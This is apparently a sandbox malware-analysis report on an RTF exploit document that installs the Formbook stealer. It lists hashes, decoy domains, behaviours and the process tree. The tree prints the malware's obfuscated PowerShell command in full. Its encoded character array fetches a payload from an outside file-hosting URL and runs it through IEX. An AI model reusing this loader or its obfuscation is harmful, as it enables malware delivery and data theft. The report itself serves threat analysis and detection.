Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

SecuriteIn...07.rtf

windows7-x64

10

SecuriteIn...07.rtf

windows10-2004-x64

1

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    26/09/2022, 14:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.9690.14807.rtf

  • Size

    864KB

  • MD5

    027e492f7ceb4cf8023d311602434de3

  • SHA1

    5b5a739f5688ce1154a2a4af2de1e9db8854294d

  • SHA256

    5ddfcee976daf1f71a8b1f41a4dd170e80683b2e79d48e312d6010f941de148f

  • SHA512

    bd63344081b7b35e9519b40744aae0af19e5f0a23472696db4f7dcabf2c45c90dd59ac471512aca438e37934d361afd5a8d72cca4ec483b2083cde7140fb3b5d

  • SSDEEP

    1536:kpGEch6dtRGWbCtpl5kmrJ//RFxXxBpzB9TBtiBqK8Qf6YXkY0kY0kY92i3e+6fV:gho

Score
10/10
formbookn25nratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

n25n

Decoy

counterblast-stately.net

anhuiluan.xyz

searchscrealestate.com

ipfsvault.com

q2307.com

doingout.com

empyreanaudio.com

defectivehomes.info

intlword.online

costumeking.kiwi

backachersalpacas.com

kellysheros.directory

mtbscecure.net

realestateprogression.com

shengmimama.com

sdftsb.com

ghafouli165.online

effexorbuy.top

flipgrill.store

nevadatechhelp.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Formbook payload 6 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:420
      • C:\Windows\SysWOW64\calc.exe
        C:\Windows\SysWOW64\calc.exe /Processid:{1C776729-24AF-40B9-B938-02E8698D3701}
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:1880
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1368
      • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.9690.14807.rtf"
        2⤵
        • Drops file in Windows directory
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          3⤵
            PID:1648
        • C:\Windows\SysWOW64\help.exe
          "C:\Windows\SysWOW64\help.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:624
          • C:\Windows\SysWOW64\cmd.exe
            /c del "C:\Windows\SysWOW64\calc.exe"
            3⤵
              PID:1292
        • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          1⤵
          • Launches Equation Editor
          • Suspicious use of WriteProcessMemory
          PID:584
          • C:\Windows\SysWOW64\CmD.exe
            CmD.exe /C cscript %tmp%\Client.vbs A C
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:520
            • C:\Windows\SysWOW64\cscript.exe
              cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
              3⤵
                PID:580
          • C:\Windows\system32\cMd.exe
            cMd /c cOpY "C:\Users\Admin\AppData\Local\Temp\Client.vbs" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches" /Y
            1⤵
            • Process spawned unexpected child process
            PID:1612
          • C:\Windows\System32\WindowsPowerShell\v1.0\PoWershell.exe
            PoWershell {;$CXL17BPPB8B01 = (New-Object -TypeName $QFQG0B6JY9F).GetString($3131XZ0KQITM4,0, $l);$E20LLLLT06Z = $QFQG0B6JY9F::UTF8.GetBytes((n-eiorvsxpk5 $CXL17BPPB8B01 2>&1 | Out-String )) + $QFQG0B6JY9F::UTF8.GetBytes($Q0Q1MD4L55M3J);$1A055IB1FJNK.Write($E20LLLLT06Z, 0, $E20LLLLT06Z.Length);};$08E071X96D5YAO1DLT6SI11G1C4K2XTW0Z2HLA0PGL1RB0C1VBTZXS4SKFZM2FC0=@(40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,115,54,46,107,114,97,107,101,110,102,105,108,101,115,46,99,111,109,47,117,112,108,111,97,100,115,47,50,54,45,48,57,45,50,48,50,50,47,56,66,53,53,86,81,68,87,104,105,47,105,109,97,103,101,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($08E071X96D5YAO1DLT6SI11G1C4K2XTW0Z2HLA0PGL1RB0C1VBTZXS4SKFZM2FC0)|I`E`X
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1040

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Client.vbs
            Filesize

            73KB

            MD5

            1e4cb10bcea2e90717b99443fb20d83b

            SHA1

            c53a5e93c03172b9b7112f1962f6742fd30ad342

            SHA256

            14cffd00f97bea85a2f5f1d3f3e675f733bd6df621c60900aaac45982d08784f

            SHA512

            6d1b32774c5b1d05247bd73c9f2e9c1637f3b01ca24860591e0feca4adf19abc798e2937583bf789e0d0a69eb26d3ef7a41bbe75fe26cbede68dddede17d1d32

            Download Submit

          • memory/624-96-0x0000000000110000-0x000000000013F000-memory.dmp

            Filesize

            188KB

            Download

          • memory/624-94-0x00000000009D0000-0x0000000000A63000-memory.dmp

            Filesize

            588KB

            Download

          • memory/624-92-0x00000000006C0000-0x00000000009C3000-memory.dmp

            Filesize

            3.0MB

            Download

          • memory/624-90-0x0000000000110000-0x000000000013F000-memory.dmp

            Filesize

            188KB

            Download

          • memory/624-89-0x0000000000D00000-0x0000000000D06000-memory.dmp

            Filesize

            24KB

            Download

          • memory/1040-66-0x000007FEF3CA0000-0x000007FEF47FD000-memory.dmp

            Filesize

            11.4MB

            Download

          • memory/1040-77-0x0000000002684000-0x0000000002687000-memory.dmp

            Filesize

            12KB

            Download

          • memory/1040-67-0x0000000002684000-0x0000000002687000-memory.dmp

            Filesize

            12KB

            Download

          • memory/1040-68-0x000000000268B000-0x00000000026AA000-memory.dmp

            Filesize

            124KB

            Download

          • memory/1040-70-0x0000000002684000-0x0000000002687000-memory.dmp

            Filesize

            12KB

            Download

          • memory/1040-64-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1040-65-0x000007FEF4930000-0x000007FEF5353000-memory.dmp

            Filesize

            10.1MB

            Download

          • memory/1040-78-0x000000000268B000-0x00000000026AA000-memory.dmp

            Filesize

            124KB

            Download

          • memory/1368-83-0x0000000006FA0000-0x0000000007107000-memory.dmp

            Filesize

            1.4MB

            Download

          • memory/1368-97-0x0000000007110000-0x0000000007268000-memory.dmp

            Filesize

            1.3MB

            Download

          • memory/1368-98-0x0000000007110000-0x0000000007268000-memory.dmp

            Filesize

            1.3MB

            Download

          • memory/1368-86-0x0000000006610000-0x00000000066EB000-memory.dmp

            Filesize

            876KB

            Download

          • memory/1880-85-0x00000000001D0000-0x00000000001E4000-memory.dmp

            Filesize

            80KB

            Download

          • memory/1880-75-0x0000000000400000-0x000000000042F000-memory.dmp

            Filesize

            188KB

            Download

          • memory/1880-81-0x0000000000180000-0x0000000000194000-memory.dmp

            Filesize

            80KB

            Download

          • memory/1880-82-0x0000000000400000-0x000000000042F000-memory.dmp

            Filesize

            188KB

            Download

          • memory/1880-72-0x0000000000400000-0x000000000042F000-memory.dmp

            Filesize

            188KB

            Download

          • memory/1880-88-0x0000000000400000-0x000000000042F000-memory.dmp

            Filesize

            188KB

            Download

          • memory/1880-71-0x0000000000400000-0x000000000042F000-memory.dmp

            Filesize

            188KB

            Download

          • memory/1880-80-0x00000000008D0000-0x0000000000BD3000-memory.dmp

            Filesize

            3.0MB

            Download

          • memory/2032-54-0x0000000072DE1000-0x0000000072DE4000-memory.dmp

            Filesize

            12KB

            Download

          • memory/2032-57-0x00000000766D1000-0x00000000766D3000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2032-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2032-55-0x0000000070861000-0x0000000070863000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2032-69-0x000000007184D000-0x0000000071858000-memory.dmp

            Filesize

            44KB

            Download

          • memory/2032-58-0x000000007184D000-0x0000000071858000-memory.dmp

            Filesize

            44KB

            Download

          • memory/2032-99-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2032-100-0x000000007184D000-0x0000000071858000-memory.dmp

            Filesize

            44KB

            Download